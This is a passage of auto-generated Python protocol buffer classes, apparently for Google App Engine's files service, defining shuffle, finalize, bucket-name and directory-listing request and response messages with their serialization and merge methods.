n += self.lengthString(len(self.shuffle_name_))
n += 1 * len(self.input_)
for i in xrange(len(self.input_)): n += self.lengthString(self.input_[i].ByteSize())
n += self.lengthString(self.output_.ByteSize())
n += self.lengthVarInt64(self.shuffle_size_bytes_)
n += self.lengthString(self.callback_.ByteSize())
return n + 4
def ByteSizePartial(self):
n = 0
if (self.has_shuffle_name_):
n += 1
n += self.lengthString(len(self.shuffle_name_))
n += 1 * len(self.input_)
for i in xrange(len(self.input_)): n += self.lengthString(self.input_[i].ByteSizePartial())
if (self.has_output_):
n += 1
n += self.lengthString(self.output_.ByteSizePartial())
if (self.has_shuffle_size_bytes_):
n += 1
n += self.lengthVarInt64(self.shuffle_size_bytes_)
if (self.has_callback_):
n += 1
n += self.lengthString(self.callback_.ByteSizePartial())
return n
def Clear(self):
self.clear_shuffle_name()
self.clear_input()
self.clear_output()
self.clear_shuffle_size_bytes()
self.clear_callback()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.shuffle_name_)
for i in xrange(len(self.input_)):
out.putVarInt32(18)
out.putVarInt32(self.input_[i].ByteSize())
self.input_[i].OutputUnchecked(out)
out.putVarInt32(26)
out.putVarInt32(self.output_.ByteSize())
self.output_.OutputUnchecked(out)
out.putVarInt32(32)
out.putVarInt64(self.shuffle_size_bytes_)
out.putVarInt32(42)
out.putVarInt32(self.callback_.ByteSize())
self.callback_.OutputUnchecked(out)
def OutputPartial(self, out):
if (self.has_shuffle_name_):
out.putVarInt32(10)
out.putPrefixedString(self.shuffle_name_)
for i in xrange(len(self.input_)):
out.putVarInt32(18)
out.putVarInt32(self.input_[i].ByteSizePartial())
self.input_[i].OutputPartial(out)
if (self.has_output_):
out.putVarInt32(26)
out.putVarInt32(self.output_.ByteSizePartial())
self.output_.OutputPartial(out)
if (self.has_shuffle_size_bytes_):
out.putVarInt32(32)
out.putVarInt64(self.shuffle_size_bytes_)
if (self.has_callback_):
out.putVarInt32(42)
out.putVarInt32(self.callback_.ByteSizePartial())
self.callback_.OutputPartial(out)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_shuffle_name(d.getPrefixedString())
continue
if tt == 18:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_input().TryMerge(tmp)
continue
if tt == 26:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_output().TryMerge(tmp)
continue
if tt == 32:
self.set_shuffle_size_bytes(d.getVarInt64())
continue
if tt == 42:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.mutable_callback().TryMerge(tmp)
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_shuffle_name_: res+=prefix+("shuffle_name: %s\n" % self.DebugFormatString(self.shuffle_name_))
cnt=0
for e in self.input_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("input%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_output_:
res+=prefix+"output <\n"
res+=self.output_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
if self.has_shuffle_size_bytes_: res+=prefix+("shuffle_size_bytes: %s\n" % self.DebugFormatInt64(self.shuffle_size_bytes_))
if self.has_callback_:
res+=prefix+"callback <\n"
res+=self.callback_.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kshuffle_name = 1
kinput = 2
koutput = 3
kshuffle_size_bytes = 4
kcallback = 5
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "shuffle_name",
2: "input",
3: "output",
4: "shuffle_size_bytes",
5: "callback",
}, 5)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.NUMERIC,
5: ProtocolBuffer.Encoder.STRING,
}, 5, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleRequest'
class ShuffleResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleResponse'
class GetShuffleStatusRequest(ProtocolBuffer.ProtocolMessage):
has_shuffle_name_ = 0
shuffle_name_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def shuffle_name(self): return self.shuffle_name_
def set_shuffle_name(self, x):
self.has_shuffle_name_ = 1
self.shuffle_name_ = x
def clear_shuffle_name(self):
if self.has_shuffle_name_:
self.has_shuffle_name_ = 0
self.shuffle_name_ = ""
def has_shuffle_name(self): return self.has_shuffle_name_
def MergeFrom(self, x):
assert x is not self
if (x.has_shuffle_name()): self.set_shuffle_name(x.shuffle_name())
def Equals(self, x):
if x is self: return 1
if self.has_shuffle_name_ != x.has_shuffle_name_: return 0
if self.has_shuffle_name_ and self.shuffle_name_ != x.shuffle_name_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_shuffle_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: shuffle_name not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.shuffle_name_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_shuffle_name_):
n += 1
n += self.lengthString(len(self.shuffle_name_))
return n
def Clear(self):
self.clear_shuffle_name()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.shuffle_name_)
def OutputPartial(self, out):
if (self.has_shuffle_name_):
out.putVarInt32(10)
out.putPrefixedString(self.shuffle_name_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_shuffle_name(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_shuffle_name_: res+=prefix+("shuffle_name: %s\n" % self.DebugFormatString(self.shuffle_name_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kshuffle_name = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "shuffle_name",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetShuffleStatusRequest'
class GetShuffleStatusResponse(ProtocolBuffer.ProtocolMessage):
has_status_ = 0
status_ = 0
has_description_ = 0
description_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def status(self): return self.status_
def set_status(self, x):
self.has_status_ = 1
self.status_ = x
def clear_status(self):
if self.has_status_:
self.has_status_ = 0
self.status_ = 0
def has_status(self): return self.has_status_
def description(self): return self.description_
def set_description(self, x):
self.has_description_ = 1
self.description_ = x
def clear_description(self):
if self.has_description_:
self.has_description_ = 0
self.description_ = ""
def has_description(self): return self.has_description_
def MergeFrom(self, x):
assert x is not self
if (x.has_status()): self.set_status(x.status())
if (x.has_description()): self.set_description(x.description())
def Equals(self, x):
if x is self: return 1
if self.has_status_ != x.has_status_: return 0
if self.has_status_ and self.status_ != x.status_: return 0
if self.has_description_ != x.has_description_: return 0
if self.has_description_ and self.description_ != x.description_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_status_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: status not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthVarInt64(self.status_)
if (self.has_description_): n += 1 + self.lengthString(len(self.description_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_status_):
n += 1
n += self.lengthVarInt64(self.status_)
if (self.has_description_): n += 1 + self.lengthString(len(self.description_))
return n
def Clear(self):
self.clear_status()
self.clear_description()
def OutputUnchecked(self, out):
out.putVarInt32(8)
out.putVarInt32(self.status_)
if (self.has_description_):
out.putVarInt32(18)
out.putPrefixedString(self.description_)
def OutputPartial(self, out):
if (self.has_status_):
out.putVarInt32(8)
out.putVarInt32(self.status_)
if (self.has_description_):
out.putVarInt32(18)
out.putPrefixedString(self.description_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_status(d.getVarInt32())
continue
if tt == 18:
self.set_description(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_status_: res+=prefix+("status: %s\n" % self.DebugFormatInt32(self.status_))
if self.has_description_: res+=prefix+("description: %s\n" % self.DebugFormatString(self.description_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kstatus = 1
kdescription = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "status",
2: "description",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetShuffleStatusResponse'
class GetCapabilitiesRequest(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetCapabilitiesRequest'
class GetCapabilitiesResponse(ProtocolBuffer.ProtocolMessage):
has_shuffle_available_ = 0
shuffle_available_ = 0
def __init__(self, contents=None):
self.filesystem_ = []
if contents is not None: self.MergeFromString(contents)
def filesystem_size(self): return len(self.filesystem_)
def filesystem_list(self): return self.filesystem_
def filesystem(self, i):
return self.filesystem_[i]
def set_filesystem(self, i, x):
self.filesystem_[i] = x
def add_filesystem(self, x):
self.filesystem_.append(x)
def clear_filesystem(self):
self.filesystem_ = []
def shuffle_available(self): return self.shuffle_available_
def set_shuffle_available(self, x):
self.has_shuffle_available_ = 1
self.shuffle_available_ = x
def clear_shuffle_available(self):
if self.has_shuffle_available_:
self.has_shuffle_available_ = 0
self.shuffle_available_ = 0
def has_shuffle_available(self): return self.has_shuffle_available_
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.filesystem_size()): self.add_filesystem(x.filesystem(i))
if (x.has_shuffle_available()): self.set_shuffle_available(x.shuffle_available())
def Equals(self, x):
if x is self: return 1
if len(self.filesystem_) != len(x.filesystem_): return 0
for e1, e2 in zip(self.filesystem_, x.filesystem_):
if e1 != e2: return 0
if self.has_shuffle_available_ != x.has_shuffle_available_: return 0
if self.has_shuffle_available_ and self.shuffle_available_ != x.shuffle_available_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_shuffle_available_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: shuffle_available not set.')
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.filesystem_)
for i in xrange(len(self.filesystem_)): n += self.lengthString(len(self.filesystem_[i]))
return n + 2
def ByteSizePartial(self):
n = 0
n += 1 * len(self.filesystem_)
for i in xrange(len(self.filesystem_)): n += self.lengthString(len(self.filesystem_[i]))
if (self.has_shuffle_available_):
n += 2
return n
def Clear(self):
self.clear_filesystem()
self.clear_shuffle_available()
def OutputUnchecked(self, out):
for i in xrange(len(self.filesystem_)):
out.putVarInt32(10)
out.putPrefixedString(self.filesystem_[i])
out.putVarInt32(16)
out.putBoolean(self.shuffle_available_)
def OutputPartial(self, out):
for i in xrange(len(self.filesystem_)):
out.putVarInt32(10)
out.putPrefixedString(self.filesystem_[i])
if (self.has_shuffle_available_):
out.putVarInt32(16)
out.putBoolean(self.shuffle_available_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.add_filesystem(d.getPrefixedString())
continue
if tt == 16:
self.set_shuffle_available(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.filesystem_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("filesystem%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
if self.has_shuffle_available_: res+=prefix+("shuffle_available: %s\n" % self.DebugFormatBool(self.shuffle_available_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilesystem = 1
kshuffle_available = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filesystem",
2: "shuffle_available",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.NUMERIC,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetCapabilitiesResponse'
class FinalizeRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
return n
def Clear(self):
self.clear_filename()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.FinalizeRequest'
class FinalizeResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.FinalizeResponse'
class GetDefaultGsBucketNameRequest(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetDefaultGsBucketNameRequest'
class GetDefaultGsBucketNameResponse(ProtocolBuffer.ProtocolMessage):
has_default_gs_bucket_name_ = 0
default_gs_bucket_name_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def default_gs_bucket_name(self): return self.default_gs_bucket_name_
def set_default_gs_bucket_name(self, x):
self.has_default_gs_bucket_name_ = 1
self.default_gs_bucket_name_ = x
def clear_default_gs_bucket_name(self):
if self.has_default_gs_bucket_name_:
self.has_default_gs_bucket_name_ = 0
self.default_gs_bucket_name_ = ""
def has_default_gs_bucket_name(self): return self.has_default_gs_bucket_name_
def MergeFrom(self, x):
assert x is not self
if (x.has_default_gs_bucket_name()): self.set_default_gs_bucket_name(x.default_gs_bucket_name())
def Equals(self, x):
if x is self: return 1
if self.has_default_gs_bucket_name_ != x.has_default_gs_bucket_name_: return 0
if self.has_default_gs_bucket_name_ and self.default_gs_bucket_name_ != x.default_gs_bucket_name_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_default_gs_bucket_name_): n += 1 + self.lengthString(len(self.default_gs_bucket_name_))
return n
def ByteSizePartial(self):
n = 0
if (self.has_default_gs_bucket_name_): n += 1 + self.lengthString(len(self.default_gs_bucket_name_))
return n
def Clear(self):
self.clear_default_gs_bucket_name()
def OutputUnchecked(self, out):
if (self.has_default_gs_bucket_name_):
out.putVarInt32(10)
out.putPrefixedString(self.default_gs_bucket_name_)
def OutputPartial(self, out):
if (self.has_default_gs_bucket_name_):
out.putVarInt32(10)
out.putPrefixedString(self.default_gs_bucket_name_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_default_gs_bucket_name(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_default_gs_bucket_name_: res+=prefix+("default_gs_bucket_name: %s\n" % self.DebugFormatString(self.default_gs_bucket_name_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdefault_gs_bucket_name = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "default_gs_bucket_name",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.GetDefaultGsBucketNameResponse'
class ListDirRequest(ProtocolBuffer.ProtocolMessage):
has_path_ = 0
path_ = ""
has_marker_ = 0
marker_ = ""
has_max_keys_ = 0
max_keys_ = 0
has_prefix_ = 0
prefix_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def path(self): return self.path_
def set_path(self, x):
self.has_path_ = 1
self.path_ = x
def clear_path(self):
if self.has_path_:
self.has_path_ = 0
self.path_ = ""
def has_path(self): return self.has_path_
def marker(self): return self.marker_
def set_marker(self, x):
self.has_marker_ = 1
self.marker_ = x
def clear_marker(self):
if self.has_marker_:
self.has_marker_ = 0
self.marker_ = ""
def has_marker(self): return self.has_marker_
def max_keys(self): return self.max_keys_
def set_max_keys(self, x):
self.has_max_keys_ = 1
self.max_keys_ = x
def clear_max_keys(self):
if self.has_max_keys_:
self.has_max_keys_ = 0
self.max_keys_ = 0
def has_max_keys(self): return self.has_max_keys_
def prefix(self): return self.prefix_
def set_prefix(self, x):
self.has_prefix_ = 1
self.prefix_ = x
def clear_prefix(self):
if self.has_prefix_:
self.has_prefix_ = 0
self.prefix_ = ""
def has_prefix(self): return self.has_prefix_
def MergeFrom(self, x):
assert x is not self
if (x.has_path()): self.set_path(x.path())
if (x.has_marker()): self.set_marker(x.marker())
if (x.has_max_keys()): self.set_max_keys(x.max_keys())
if (x.has_prefix()): self.set_prefix(x.prefix())
def Equals(self, x):
if x is self: return 1
if self.has_path_ != x.has_path_: return 0
if self.has_path_ and self.path_ != x.path_: return 0
if self.has_marker_ != x.has_marker_: return 0
if self.has_marker_ and self.marker_ != x.marker_: return 0
if self.has_max_keys_ != x.has_max_keys_: return 0
if self.has_max_keys_ and self.max_keys_ != x.max_keys_: return 0
if self.has_prefix_ != x.has_prefix_: return 0
if self.has_prefix_ and self.prefix_ != x.prefix_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_path_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: path not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.path_))
if (self.has_marker_): n += 1 + self.lengthString(len(self.marker_))
if (self.has_max_keys_): n += 1 + self.lengthVarInt64(self.max_keys_)
if (self.has_prefix_): n += 1 + self.lengthString(len(self.prefix_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_path_):
n += 1
n += self.lengthString(len(self.path_))
if (self.has_marker_): n += 1 + self.lengthString(len(self.marker_))
if (self.has_max_keys_): n += 1 + self.lengthVarInt64(self.max_keys_)
if (self.has_prefix_): n += 1 + self.lengthString(len(self.prefix_))
return n
def Clear(self):
self.clear_path()
self.clear_marker()
self.clear_max_keys()
self.clear_prefix()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.path_)
if (self.has_marker_):
out.putVarInt32(18)
out.putPrefixedString(self.marker_)
if (self.has_max_keys_):
out.putVarInt32(24)
out.putVarInt64(self.max_keys_)
if (self.has_prefix_):
out.putVarInt32(34)
out.putPrefixedString(self.prefix_)
def OutputPartial(self, out):
if (self.has_path_):
out.putVarInt32(10)
out.putPrefixedString(self.path_)
if (self.has_marker_):
out.putVarInt32(18)
out.putPrefixedString(self.marker_)
if (self.has_max_keys_):
out.putVarInt32(24)
out.putVarInt64(self.max_keys_)
if (self.has_prefix_):
out.putVarInt32(34)
out.putPrefixedString(self.prefix_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_path(d.getPrefixedString())
continue
if tt == 18:
self.set_marker(d.getPrefixedString())
continue
if tt == 24:
self.set_max_keys(d.getVarInt64())
continue
if tt == 34:
self.set_prefix(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_path_: res+=prefix+("path: %s\n" % self.DebugFormatString(self.path_))
if self.has_marker_: res+=prefix+("marker: %s\n" % self.DebugFormatString(self.marker_))
if self.has_max_keys_: res+=prefix+("max_keys: %s\n" % self.DebugFormatInt64(self.max_keys_))
if self.has_prefix_: res+=prefix+("prefix: %s\n" % self.DebugFormatString(self.prefix_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kpath = 1
kmarker = 2
kmax_keys = 3
kprefix = 4
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "path",
2: "marker",
3: "max_keys",
4: "prefix",
}, 4)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.STRING,
}, 4, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ListDirRequest'
class ListDirResponse(ProtocolBuffer.ProtocolMessage):
def __init__(self, contents=None):
self.filenames_ = []
if contents is not None: self.MergeFromString(contents)
def filenames_size(self): return len(self.filenames_)
def filenames_list(self): return self.filenames_
def filenames(self, i):
return self.filenames_[i]
def set_filenames(self, i, x):
self.filenames_[i] = x
def add_filenames(self, x):
self.filenames_.append(x)
def clear_filenames(self):
self.filenames_ = []
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.filenames_size()): self.add_filenames(x.filenames(i))
def Equals(self, x):
if x is self: return 1
if len(self.filenames_) != len(x.filenames_): return 0
for e1, e2 in zip(self.filenames_, x.filenames_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.filenames_)
for i in xrange(len(self.filenames_)): n += self.lengthString(len(self.filenames_[i]))
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.filenames_)
for i in xrange(len(self.filenames_)): n += self.lengthString(len(self.filenames_[i]))
return n
def Clear(self):
self.clear_filenames()
def OutputUnchecked(self, out):
for i in xrange(len(self.filenames_)):
out.putVarInt32(10)
out.putPrefixedString(self.filenames_[i])
def OutputPartial(self, out):
for i in xrange(len(self.filenames_)):
out.putVarInt32(10)
out.putPrefixedString(self.filenames_[i])
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.add_filenames(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.filenames_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("filenames%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilenames = 1
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filenames",
}, 1)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
